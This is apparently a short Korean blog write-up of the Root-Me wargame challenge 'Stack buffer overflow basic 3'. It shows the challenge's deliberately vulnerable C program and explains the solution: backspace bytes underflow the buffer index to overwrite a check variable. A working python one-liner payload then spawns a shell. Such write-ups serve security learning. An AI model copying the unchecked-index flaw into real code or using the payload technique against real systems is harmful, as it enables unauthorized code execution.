-
Stack buffer overflow basic 3Root-Me.org 2016. 7. 16. 02:57
/* gcc -m32 -o ch16 ch16.c */ #include <stdio.h> #include <sys/time.h> #include <sys/types.h> #include <unistd.h> void shell(void); int main() { char buffer[64]; int check; int i = 0; int count = 0; printf("Enter your name: "); fflush(stdout); while(1) { if(count >= 64) printf("Oh no...Sorry !\n"); if(check == 0xbffffabc) shell(); else { read(fileno(stdin),&i,1); switch(i) { case '\n': printf("\a"); break; case 0x08: count--; printf("\b"); break; case 0x04: printf("\t"); count++; break; case 0x90: printf("\a"); count++; break; default: buffer[count] = i; count++; break; } } } } void shell(void) { system("/bin/dash"); }
count가 64 이상이면 쏘리를 띄우는데, 64까지 갈필요가 있나..
buffer 앞엔 check라는 변수가있으니까 그냥 -4 해주고 거길 덮어씌워주면될거같다
(python -c 'print "\x08"*4 + "\xbc\xfa\xff\xbf"';cat;) | ./ch16
'Root-Me.org' 카테고리의 다른 글
Stack buffer overflow basic 6 (0) 2016.07.16 Stack buffer over flow (0) 2015.06.07 64bit Stack buffer overflow (0) 2015.06.07